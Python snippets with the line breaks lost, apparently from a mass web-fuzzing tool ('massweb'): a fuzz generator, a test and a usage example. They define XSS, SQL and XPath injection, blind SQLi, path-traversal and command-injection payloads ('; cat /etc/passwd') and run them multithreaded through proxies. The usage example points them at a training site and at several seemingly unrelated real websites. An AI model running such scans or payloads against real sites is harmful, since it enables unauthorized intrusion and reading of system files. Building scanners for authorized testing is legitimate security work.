def fuzz(targets): xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"]) sqli_xpathi_payload = Payload("')--#", check_type_list = ["sqli", "xpathi"]) trav_payload = Payload('../../../../../../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list = ["trav"]) xpathi_payload = Payload('<!--', check_type_list = ["xpathi"]) osci_payload = Payload('; cat /etc/passwd') wf = WebFuzzer(targets, num_threads=25, time_per_url=5, request_timeout=4, proxy_list=proxy_scan_list, hadoop_reporting=True) wf.add_payload(xss_payload) wf.add_payload(sqli_xpathi_payload) wf.add_payload(trav_payload) wf.add_payload(xpathi_payload) wf.add_payload(osci_payload) wf.generate_fuzzy_targets() wf_results = wf.fuzz() generic_true_payload = BSQLIPayload(" AND 1=1", {"truth": True}) generic_false_payload = BSQLIPayload(" AND 1=2", {"truth": False}) generic_payload_group = BSQLIPayloadGroup(generic_true_payload, generic_false_payload) dump_true_payload = BSQLIPayload(" OR 1=1", {"truth": True}) dump_false_payload = BSQLIPayload(" OR 1=2", {"truth": False}) dump_payload_group = BSQLIPayloadGroup(dump_true_payload, dump_false_payload) payload_groups = [generic_payload_group, dump_payload_group] bf = BSQLiFuzzer(targets, bsqli_payload_groups=payload_groups, hadoop_reporting=True, num_threads=10) bf_results = bf.fuzz() for result in wf_results: yield result for result in bf_results: yield result
def test_webfuzzer(self): wf = WebFuzzer(targets, num_threads=25, time_per_url=5, request_timeout=4, proxy_list=proxy_scan_list, hadoop_reporting=False) for payload in payloads: wf.add_payload(payload) wf.generate_fuzzy_targets() result = wf.fuzz()
print "Results of our fuzzing:" for r in wf.fuzz(): print r, r.fuzzy_target.ttype, r.fuzzy_target.payload """ from massweb.fuzzers.web_fuzzer import WebFuzzer from massweb.payloads.payload import Payload proxies = [{"http": "user:password@http://proxy.example.com:1234/some/path"}, {"http": "otheruser:otherpassword@http://proxy2.example.net:6789/some/path"}] xss_payload = Payload('"><ScRipT>alert(31337)</ScrIpT>', check_type_list = ["xss"]) trav_payload = Payload('../../../../../../../../../../../../../../../../../../etc/passwd', check_type_list=["trav"]) sqli_xpathi_payload = Payload("')--", check_type_list=["sqli", "xpathi"]) wf = WebFuzzer(num_threads=30, time_per_url=5, proxy_list=proxies) wf.add_payload(xss_payload) wf.add_payload(trav_payload) wf.add_payload(sqli_xpathi_payload) wf.add_target_from_url(u"http://course.hyperiongray.com/vuln1") wf.add_target_from_url(u"http://course.hyperiongray.com/vuln2/898538a7335fd8e6bac310f079ba3fd1/") wf.add_target_from_url(u"http://www.wpsurfing.co.za/?feed=%22%3E%3CScRipT%3Ealert%2831337%29%3C%2FScrIpT%3E") wf.add_target_from_url(u"http://www.sfgcd.com/ProductsBuy.asp?ProNo=1%3E&amp;ProName=1") wf.add_target_from_url(u"http://www.gayoutdoors.com/page.cfm?snippetset=yes&amp;typeofsite=snippetdetail&amp;ID=1368&amp;Sectionid=1") wf.add_target_from_url(u"http://www.dobrevsource.org/index.php?id=1") print "Targets list pre post determination:" for target in wf.targets: print target print "Targets list after additional injection points have been found:" wf.determine_posts_from_targets()